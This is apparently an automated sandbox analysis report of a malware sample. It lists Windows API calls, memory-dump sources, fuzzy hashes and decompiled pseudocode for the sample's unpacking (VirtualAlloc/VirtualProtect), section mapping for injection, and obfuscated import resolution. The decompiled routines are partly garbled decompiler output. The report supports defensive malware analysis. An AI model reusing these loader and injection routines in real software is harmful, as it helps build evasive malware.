                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,0000DF3D,00003000,00000040), ref: 00435B45
                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00435B7B
                                                                                                                                                                        • VirtualProtect.KERNEL32(00400000,00000000,00000004,004359A5), ref: 00435C8A
                                                                                                                                                                        • VirtualProtect.KERNEL32(00400000,00001000,00000004,004359A5), ref: 00435CB1
                                                                                                                                                                        • VirtualProtect.KERNEL32(00000000,?,00000002,004359A5), ref: 00435D77
                                                                                                                                                                        • VirtualProtect.KERNEL32(00000000,?,00000002,004359A5,?), ref: 00435DCD
                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00435DF1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.429066587.0000000000435000.00000040.00020000.sdmp, Offset: 00435000, based on PE: false
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Virtual$Protect$Alloc$Free
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2574235972-0
                                                                                                                                                                        • Opcode ID: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
                                                                                                                                                                        • Instruction ID: d45f3c6101e7fe05159cbc00f7f1c4ba997776035c7e8d397e7b1361e89befb7
                                                                                                                                                                        • Opcode Fuzzy Hash: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
                                                                                                                                                                        • Instruction Fuzzy Hash: AFD18A726006009FEB11EF54C880F5277B6FF68314F890299ED0D9F66ADB74A921CB6C
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000992,00003000,00000040,00000992,00800000), ref: 008005D8
                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00000062,00003000,00000040,0080003A), ref: 0080060F
                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,0000DF3D,00003000,00000040), ref: 0080066F
                                                                                                                                                                        • VirtualFree.KERNELBASE(00820000,00000000,00008000), ref: 008006A5
                                                                                                                                                                        • VirtualProtect.KERNELBASE(00400000,0000F000,00000004,008004CF), ref: 008007B4
                                                                                                                                                                        • VirtualProtect.KERNEL32(00400000,00001000,00000004,008004CF), ref: 008007DB
                                                                                                                                                                          • Part of subcall function 008003A1: LoadLibraryExA.KERNELBASE(?,00000000,00000000,?), ref: 008003DA
                                                                                                                                                                        • VirtualProtect.KERNELBASE(00400000,?,00000002,008004CF), ref: 008008A1
                                                                                                                                                                        • VirtualProtect.KERNELBASE(00400000,?,00000002,008004CF,?), ref: 008008F7
                                                                                                                                                                        • VirtualFree.KERNELBASE(00820000,00000000,00008000), ref: 0080091B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.429106240.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: false
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Virtual$Protect$Alloc$Free$LibraryLoad
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1732388798-0
                                                                                                                                                                        • Opcode ID: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
                                                                                                                                                                        • Instruction ID: a39150e54f6a73939501a8bdf2c425cdd169f816aa0e8100bcd6ce85bbce8bc5
                                                                                                                                                                        • Opcode Fuzzy Hash: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
                                                                                                                                                                        • Instruction Fuzzy Hash: 8AD17D727002009FEB65EF54CC80F5177A6FF64710F9902A4ED0D9F6AADA74A921CF68
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 72%
                                                                                                                                                                        			E00402F98(intOrPtr* __eax, void* __ecx, void* __edx, intOrPtr* __esi) {
                                                                                                                                                                        				long _v8;
                                                                                                                                                                        				char _v12;
                                                                                                                                                                        				intOrPtr _v544;
                                                                                                                                                                        				intOrPtr _v552;
                                                                                                                                                                        				void _v724;
                                                                                                                                                                        				char _v728;
                                                                                                                                                                        				long _t40;
                                                                                                                                                                        				long _t48;
                                                                                                                                                                        				intOrPtr _t55;
                                                                                                                                                                        				void* _t56;
                                                                                                                                                                        				intOrPtr* _t58;
                                                                                                                                                                        				void* _t60;
                                                                                                                                                                        				intOrPtr* _t61;
                                                                                                                                                                        				intOrPtr _t62;
                                                                                                                                                                        				intOrPtr* _t63;
                                                                                                                                                                        				void* _t67;
                                                                                                                                                                        
                                                                                                                                                                        				_t63 = __esi;
                                                                                                                                                                        				_t60 = __edx;
                                                                                                                                                                        				_t56 = __ecx;
                                                                                                                                                                        				_t61 = __eax;
                                                                                                                                                                        				_v728 = 0;
                                                                                                                                                                        				memset( &_v724, 0, 0x2c8);
                                                                                                                                                                        				_t67 =  *((intOrPtr*)(_t61 + 8)) -  *0x405470; // 0x1ae8
                                                                                                                                                                        				if(_t67 == 0) {
                                                                                                                                                                        					_push( *((intOrPtr*)(__esi + 0x10)));
                                                                                                                                                                        					if( *((intOrPtr*)(__esi + 8))() != 0) {
                                                                                                                                                                        						_v8 = 0;
                                                                                                                                                                        						goto L13;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_v8 = 0x23f;
                                                                                                                                                                        					}
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_v728 = 0x10003;
                                                                                                                                                                        					_t55 = E004018E5(_t56,  *_t61);
                                                                                                                                                                        					if(_t55 == 0) {
                                                                                                                                                                        						L14:
                                                                                                                                                                        						_v8 = GetLastError();
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t40 = E00401646( *((intOrPtr*)(_t61 + 4)),  &_v728);
                                                                                                                                                                        						_v8 = _t40;
                                                                                                                                                                        						if(_t40 != 0) {
                                                                                                                                                                        							L13:
                                                                                                                                                                        							if(_v8 == 0xffffffff) {
                                                                                                                                                                        								goto L14;
                                                                                                                                                                        							}
                                                                                                                                                                        						} else {
                                                                                                                                                                        							 *(__esi + 4) =  *(__esi + 4) & 0x00000000;
                                                                                                                                                                        							 *__esi = _v544;
                                                                                                                                                                        							_t11 = _t55 + 0x218; // 0x218
                                                                                                                                                                        							_v544 = _t11;
                                                                                                                                                                        							_t13 = _t63 + 0x218; // 0x218
                                                                                                                                                                        							_v552 = _t55;
                                                                                                                                                                        							memcpy(_t13, E004031E2, 0x100);
                                                                                                                                                                        							_t16 = _t63 + 0x18; // 0x18
                                                                                                                                                                        							asm("cdq");
                                                                                                                                                                        							if( *((intOrPtr*)(__esi + 0x10)) == _t16 &&  *((intOrPtr*)(__esi + 0x14)) == _t60) {
                                                                                                                                                                        								asm("adc ecx, ecx");
                                                                                                                                                                        								 *((intOrPtr*)(__esi + 0x10)) = _t55 + 0x18;
                                                                                                                                                                        								 *((intOrPtr*)(__esi + 0x14)) = 0;
                                                                                                                                                                        							}
                                                                                                                                                                        							if(E004012A3( *_t61, _t55, _t63,  &_v12) != 0) {
                                                                                                                                                                        								_t58 =  *0x405018;
                                                                                                                                                                        								_t62 =  *((intOrPtr*)(_t61 + 4));
                                                                                                                                                                        								_push("true");
                                                                                                                                                                        								_pop(_t48);
                                                                                                                                                                        								if(_t58 != 0) {
                                                                                                                                                                        									_t48 = RtlNtStatusToDosError( *_t58(_t62,  &_v728));
                                                                                                                                                                        								}
                                                                                                                                                                        								_v8 = _t48;
                                                                                                                                                                        								goto L13;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				return _v8;
                                                                                                                                                                        			}




















                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.NTDLL ref: 00402FBA
                                                                                                                                                                        • GetCalendarWeekNumber.KERNEL32(?,?,00000318,00000008), ref: 00403098
                                                                                                                                                                          • Part of subcall function 004018E5: RtlNtStatusToDosError.NTDLL ref: 0040191D
                                                                                                                                                                          • Part of subcall function 004018E5: SetLastError.KERNEL32(00000000), ref: 00401924
                                                                                                                                                                        • GetLastError.KERNEL32(?,00000318,00000008), ref: 004030B1
                                                                                                                                                                          • Part of subcall function 00401646: RtlNtStatusToDosError.NTDLL ref: 0040165E
                                                                                                                                                                        • memcpy.NTDLL(00000218,004031E2,00000100,?,00010003,?,?,00000318,00000008), ref: 00403035
                                                                                                                                                                        • RtlNtStatusToDosError.NTDLL ref: 0040308A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Error$Status$Last$CalendarNumberWeekmemcpymemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 417590346-0
                                                                                                                                                                        • Opcode ID: 430ad605e7085fceda9ce7840f38274c23ef6bf33c3abc4e99ddae4a03f8a839
                                                                                                                                                                        • Instruction ID: ed1e5fb2af754fbc529cd80e3ce46667f67fd201a414028262d8c40079832072
                                                                                                                                                                        • Opcode Fuzzy Hash: 430ad605e7085fceda9ce7840f38274c23ef6bf33c3abc4e99ddae4a03f8a839
                                                                                                                                                                        • Instruction Fuzzy Hash: 3D318F71901209AFDB20DF65D985AABBBF8EB04304F10457FE546F3290D738AF458B55
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 80%
                                                                                                                                                                        			E00402550(void* __eax, void* __ebx) {
                                                                                                                                                                        				void* _t21;
                                                                                                                                                                        
                                                                                                                                                                        				L0:
                                                                                                                                                                        				while(1) {
                                                                                                                                                                        					asm("loopne 0x42");
                                                                                                                                                                        					 *((intOrPtr*)(__ebx + 0x7400e87d)) =  *((intOrPtr*)(__ebx + 0x7400e87d)) + __eax + 1;
                                                                                                                                                                        					if( *((intOrPtr*)(_t21 - 0x18)) == 0) {
                                                                                                                                                                        						break;
                                                                                                                                                                        					}
                                                                                                                                                                        					L3:
                                                                                                                                                                        					_push( *((intOrPtr*)(_t21 - 0x18)));
                                                                                                                                                                        				}
                                                                                                                                                                        				L5:
                                                                                                                                                                        				if( *(_t21 - 0x1c) != 0) {
                                                                                                                                                                        					memset( *(_t21 - 0x1c), 0,  *(_t21 - 0x14));
                                                                                                                                                                        					E00401759( *(_t21 - 0x1c));
                                                                                                                                                                        				}
                                                                                                                                                                        				return  *((intOrPtr*)(_t21 - 4));
                                                                                                                                                                        			}





                                                                                                                                                                        APIs
                                                                                                                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00402547
                                                                                                                                                                        • RtlNtStatusToDosError.NTDLL ref: 0040254E
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000), ref: 0040255D
                                                                                                                                                                        • memset.NTDLL ref: 00402571
                                                                                                                                                                        • memcpy.NTDLL(?,00405454,00000018,?,0040611E,?,004060D4,?,?,?,004024F8,?,00000000,00401B14,?,00000000), ref: 0040261B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ChangeCloseErrorFindNotificationSectionStatusUnmapViewmemcpymemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1928102780-0
                                                                                                                                                                        • Opcode ID: d27a42447c20540b09971236c278feefd6b6f2254b143956520aea5869f9b2f7
                                                                                                                                                                        • Instruction ID: 94ec9cae4786dc78c57028315bf82e1ce0aaff898437c032a7155da45d53ed6a
                                                                                                                                                                        • Opcode Fuzzy Hash: d27a42447c20540b09971236c278feefd6b6f2254b143956520aea5869f9b2f7
                                                                                                                                                                        • Instruction Fuzzy Hash: D7218031900641EBCB11AB65EE4AB9B7BA0FB90305F144437F115B62F2C3B95894CF5D
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                        			E0040202A(intOrPtr _a4, void** _a8, void* _a12) {
                                                                                                                                                                        				int _v12;
                                                                                                                                                                        				void* _v20;
                                                                                                                                                                        				void* _v24;
                                                                                                                                                                        				int _v28;
                                                                                                                                                                        				int _v32;
                                                                                                                                                                        				long _v36;
                                                                                                                                                                        				int _v40;
                                                                                                                                                                        				int _v44;
                                                                                                                                                                        				void* _v48;
                                                                                                                                                                        				long _t29;
                                                                                                                                                                        				long _t33;
                                                                                                                                                                        				long _t37;
                                                                                                                                                                        				intOrPtr* _t41;
                                                                                                                                                                        				long _t45;
                                                                                                                                                                        
                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                        				_t41 = _a12;
                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                        				_v24 = _a4;
                                                                                                                                                                        				_t29 = 0x40;
                                                                                                                                                                        				_v36 = _t29;
                                                                                                                                                                        				_a12 = 0;
                                                                                                                                                                        				_v12 = 0;
                                                                                                                                                                        				_v48 = 0x18;
                                                                                                                                                                        				_v44 = 0;
                                                                                                                                                                        				_v40 = 0;
                                                                                                                                                                        				_v32 = 0;
                                                                                                                                                                        				_v28 = 0;
                                                                                                                                                                        				_t33 = NtCreateSection( &_a12, 0xf001f,  &_v48,  &_v24, _t29, 0x8000000, 0); // executed
                                                                                                                                                                        				if(_t33 < 0) {
                                                                                                                                                                        					_t45 = RtlNtStatusToDosError(_t33);
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t37 = E0040171A(_a12, 0xffffffff,  &_v12); // executed
                                                                                                                                                                        					_t45 = _t37;
                                                                                                                                                                        					if(_t45 == 0) {
                                                                                                                                                                        						memset(_v12, 0, _v24);
                                                                                                                                                                        						 *_a8 = _v12;
                                                                                                                                                                        						if(_t41 != 0) {
                                                                                                                                                                        							 *_t41 = _a12;
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				if(_a12 != 0 && _t41 == 0) {
                                                                                                                                                                        					__imp__ZwClose(_a12);
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t45;
                                                                                                                                                                        			}

                                                                                                                                                                        APIs
                                                                                                                                                                        • NtCreateSection.NTDLL ref: 00402085
                                                                                                                                                                        • memset.NTDLL ref: 004020AA
                                                                                                                                                                        • RtlNtStatusToDosError.NTDLL ref: 004020C6
                                                                                                                                                                        • ZwClose.NTDLL(?), ref: 004020DA
                                                                                                                                                                          • Part of subcall function 0040171A: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 00401747
                                                                                                                                                                          • Part of subcall function 0040171A: RtlNtStatusToDosError.NTDLL ref: 0040174E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorSectionStatus$CloseCreateViewmemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 783833395-0
                                                                                                                                                                        • Opcode ID: 278b6d2b9847d7454f3808baa84b8071cf5c4a666db4d29bd2ab9391a81b9f03
                                                                                                                                                                        • Instruction ID: 132a9c8b6affafc7a110b6cde528536837f2270e12e6eda6991060347756c9fd
                                                                                                                                                                        • Opcode Fuzzy Hash: 278b6d2b9847d7454f3808baa84b8071cf5c4a666db4d29bd2ab9391a81b9f03
                                                                                                                                                                        • Instruction Fuzzy Hash: 65214CB5910219AFCB11CFA8CD449EF7BB9EB48750F104426FA11F3290D7B09A54CBA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 74%
                                                                                                                                                                        			E00402F32(void* __ebx, void* __edx, void* __eflags) {
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				void* _t5;
                                                                                                                                                                        				intOrPtr* _t8;
                                                                                                                                                                        				long _t9;
                                                                                                                                                                        				long _t14;
                                                                                                                                                                        				struct _CRITICAL_SECTION* _t15;
                                                                                                                                                                        
                                                                                                                                                                        				_push(0x28);
                                                                                                                                                                        				_t15 = E004017EF(_t5, __ebx, __eflags);
                                                                                                                                                                        				if(_t15 == 0) {
                                                                                                                                                                        					_t14 = 8;
                                                                                                                                                                        					L7:
                                                                                                                                                                        					return _t14;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t1 = _t15 + 0x18; // 0x18
                                                                                                                                                                        				_t8 = _t1;
                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0x1c)) = _t8;
                                                                                                                                                                        				 *_t8 = _t8;
                                                                                                                                                                        				InitializeCriticalSection(_t15);
                                                                                                                                                                        				_t9 = TlsAlloc();
                                                                                                                                                                        				 *(_t15 + 0x24) = _t9;
                                                                                                                                                                        				if(_t9 == 0xffffffff) {
                                                                                                                                                                        					L4:
                                                                                                                                                                        					_t14 = GetLastError();
                                                                                                                                                                        					__eflags = _t14;
                                                                                                                                                                        					if(_t14 != 0) {
                                                                                                                                                                        						E004015D2(_t15, _t15);
                                                                                                                                                                        					}
                                                                                                                                                                        					goto L7;
                                                                                                                                                                        				}
                                                                                                                                                                        				__imp__AddVectoredExceptionHandler(1, E00401E7C); // executed
                                                                                                                                                                        				 *(_t15 + 0x20) = _t9;
                                                                                                                                                                        				if(_t9 == 0) {
                                                                                                                                                                        					goto L4;
                                                                                                                                                                        				}
                                                                                                                                                                        				 *0x4054c4 = _t15;
                                                                                                                                                                        				_t14 = 0;
                                                                                                                                                                        				goto L7;
                                                                                                                                                                        			}

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004017EF: HeapAlloc.KERNEL32(00000000,?,00402F3B,00000028,?,00000000,00401829,?,00000000,?,?,004019A4,?,00000000), ref: 004017FB
                                                                                                                                                                        • InitializeCriticalSection.KERNEL32(00000000,00000028,?,00000000,00401829,?,00000000,?,?,004019A4,?,00000000), ref: 00402F4A
                                                                                                                                                                        • TlsAlloc.KERNEL32(?,00000000,00401829,?,00000000,?,?,004019A4,?,00000000), ref: 00402F50
                                                                                                                                                                        • RtlAddVectoredExceptionHandler.NTDLL(00000001,00401E7C,?,00000000,00401829,?,00000000,?,?,004019A4,?,00000000), ref: 00402F65
                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,00401829,?,00000000,?,?,004019A4,?,00000000), ref: 00402F7C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Alloc$CriticalErrorExceptionHandlerHeapInitializeLastSectionVectored
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 628750512-0
                                                                                                                                                                        • Opcode ID: 4f24cbbfb65dcb78753e3ac96d2e18a667806db2ee6b67c77e373a3283d37c7f
                                                                                                                                                                        • Instruction ID: 94f9f684659f09da9abd5f2b4159ddb8b869c631310bd1cd4650bd78252f59ca
                                                                                                                                                                        • Opcode Fuzzy Hash: 4f24cbbfb65dcb78753e3ac96d2e18a667806db2ee6b67c77e373a3283d37c7f
                                                                                                                                                                        • Instruction Fuzzy Hash: 19F0A471500B124FC3206F3A9A086477AF5ABC4750B10023BE215F62E0DBB4C4059769
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 79%
                                                                                                                                                                        			E004020E9(signed int __edx, void* _a4) {
                                                                                                                                                                        				void* __edi;
                                                                                                                                                                        				struct HINSTANCE__* _t4;
                                                                                                                                                                        				signed int _t6;
                                                                                                                                                                        				signed int _t8;
                                                                                                                                                                        				signed int _t10;
                                                                                                                                                                        				void* _t17;
                                                                                                                                                                        				void* _t18;
                                                                                                                                                                        				signed int _t19;
                                                                                                                                                                        				void* _t21;
                                                                                                                                                                        
                                                                                                                                                                        				_t19 = __edx;
                                                                                                                                                                        				_t21 = 0;
                                                                                                                                                                        				if(( *0x40543c |  *0x405440) == 0 || ( *0x405444 |  *0x405448) == 0 || ( *0x40544c |  *0x405450) == 0) {
                                                                                                                                                                        					_push("true");
                                                                                                                                                                        					_pop(_t21);
                                                                                                                                                                        					_t4 = GetModuleHandleA(0x406000); // executed
                                                                                                                                                                        					_t20 = _t4;
                                                                                                                                                                        					_t27 = _t4;
                                                                                                                                                                        					if(_t4 != 0) {
                                                                                                                                                                        						_t6 = E00401667(_t17, _t18, _t19, _t20, _t27, "true"); // executed
                                                                                                                                                                        						asm("cdq");
                                                                                                                                                                        						 *0x40543c = _t6;
                                                                                                                                                                        						_t28 = _t6 | _t19;
                                                                                                                                                                        						 *0x405440 = _t19;
                                                                                                                                                                        						if((_t6 | _t19) != 0) {
                                                                                                                                                                        							_t8 = E00401667(_t17, _t18, _t19, _t20, _t28, 0x4060d4); // executed
                                                                                                                                                                        							asm("cdq");
                                                                                                                                                                        							 *0x405444 = _t8;
                                                                                                                                                                        							_t29 = _t8 | _t19;
                                                                                                                                                                        							 *0x405448 = _t19;
                                                                                                                                                                        							if((_t8 | _t19) != 0) {
                                                                                                                                                                        								_t10 = E00401667(_t17, _t18, _t19, _t20, _t29, 0x40611e); // executed
                                                                                                                                                                        								asm("cdq");
                                                                                                                                                                        								 *0x40544c = _t10;
                                                                                                                                                                        								 *0x405450 = _t19;
                                                                                                                                                                        								if((_t10 | _t19) != 0) {
                                                                                                                                                                        									_t21 = 0;
                                                                                                                                                                        									goto L8;
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        				} else {
                                                                                                                                                                        					L8:
                                                                                                                                                                        					memcpy(_a4, "@x�w", 0x18);
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t21;
                                                                                                                                                                        			}

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleA.KERNELBASE(00406000,?,?,00402500,?,00401B14,?,00000000), ref: 0040211C
                                                                                                                                                                        • memcpy.NTDLL(?,@xw,00000018,0040611E,004060D4,?), ref: 00402183
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HandleModulememcpy
                                                                                                                                                                        • String ID: @xw
                                                                                                                                                                        • API String ID: 1801490239-2821512424
                                                                                                                                                                        • Opcode ID: 0cb2d4f22ab39955a1558cd501437ab96a023d1de6e3644a1f9ff1be46b80452
                                                                                                                                                                        • Instruction ID: 389c99753ed0c14ec7fc9ccb6a39992c9750a91ea15409a2bafa9b3af4485a95
                                                                                                                                                                        • Opcode Fuzzy Hash: 0cb2d4f22ab39955a1558cd501437ab96a023d1de6e3644a1f9ff1be46b80452
                                                                                                                                                                        • Instruction Fuzzy Hash: 3501B97168090167C720EB65EE46B8777A0E79470E7154537F604FB2F2D27558808F3E
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                        			E00401873() {
                                                                                                                                                                        				struct HINSTANCE__* _t3;
                                                                                                                                                                        				struct HINSTANCE__* _t5;
                                                                                                                                                                        				signed int _t7;
                                                                                                                                                                        				struct HINSTANCE__* _t8;
                                                                                                                                                                        				struct HINSTANCE__* _t9;
                                                                                                                                                                        				signed int _t10;
                                                                                                                                                                        				signed int _t12;
                                                                                                                                                                        
                                                                                                                                                                        				_t3 = GetModuleHandleA(0x406000); // executed
                                                                                                                                                                        				 *0x4054bc = _t3;
                                                                                                                                                                        				if(_t3 == 0) {
                                                                                                                                                                        					_push(0x7e);
                                                                                                                                                                        					goto L9;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t5 = GetModuleHandleA(0x406016); // executed
                                                                                                                                                                        					 *0x4054c0 = _t5;
                                                                                                                                                                        					_t10 = 0;
                                                                                                                                                                        					while(1) {
                                                                                                                                                                        						_t7 =  *(_t10 + 0x405014) ^  *0x405490;
                                                                                                                                                                        						_t9 =  *0x4054bc; // 0x77df0000
                                                                                                                                                                        						_push(_t7);
                                                                                                                                                                        						_t12 = 0;
                                                                                                                                                                        						_push(0);
                                                                                                                                                                        						_push(_t9);
                                                                                                                                                                        						_t8 = _t9;
                                                                                                                                                                        						"j,hHA@"();
                                                                                                                                                                        						if(_t7 != 0) {
                                                                                                                                                                        							_t12 =  *_t7 + _t8;
                                                                                                                                                                        						}
                                                                                                                                                                        						 *(_t10 + 0x405014) = _t12;
                                                                                                                                                                        						if(_t12 == 0) {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t10 = _t10 + 4;
                                                                                                                                                                        						if(_t10 < 0x14) {
                                                                                                                                                                        							continue;
                                                                                                                                                                        						} else {
                                                                                                                                                                        						}
                                                                                                                                                                        						goto L10;
                                                                                                                                                                        					}
                                                                                                                                                                        					_push("true");
                                                                                                                                                                        					L9:
                                                                                                                                                                        					_pop(0);
                                                                                                                                                                        				}
                                                                                                                                                                        				L10:
                                                                                                                                                                        				return 0;
                                                                                                                                                                        			}











                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleA.KERNELBASE(00406000,?,00000000,?,?,004019C4,?,00000000), ref: 00401884
                                                                                                                                                                        • GetModuleHandleA.KERNELBASE(00406016,?,00000000,?,?,004019C4,?,00000000), ref: 00401894
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HandleModule
                                                                                                                                                                        • String ID: pnls
                                                                                                                                                                        • API String ID: 4139908857-141991303
                                                                                                                                                                        • Opcode ID: f6d75bd0e5872fe3b7fc5afb4619f4517c521f8f65f1602023bb858a8ef3261e
                                                                                                                                                                        • Instruction ID: 3c15832363627b704726adb83fb2a2b8f3f879782681c80ed6739e0df40de01b
                                                                                                                                                                        • Opcode Fuzzy Hash: f6d75bd0e5872fe3b7fc5afb4619f4517c521f8f65f1602023bb858a8ef3261e
                                                                                                                                                                        • Instruction Fuzzy Hash: 28F0F933B1171557D620EB5A9D40B677798EB85715B024237A509F72E0C6799C008FED
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                        			E0040171A(void* _a4, void* _a8, PVOID* _a12) {
                                                                                                                                                                        				long _v8;
                                                                                                                                                                        				void* _v12;
                                                                                                                                                                        				void* _v16;
                                                                                                                                                                        				long _t12;
                                                                                                                                                                        
                                                                                                                                                                        				_v16 = 0;
                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                        				_t12 = NtMapViewOfSection(_a4, _a8, _a12, 0, 0,  &_v16,  &_v8, 2, 0, 0x40); // executed
                                                                                                                                                                        				return RtlNtStatusToDosError(_t12);
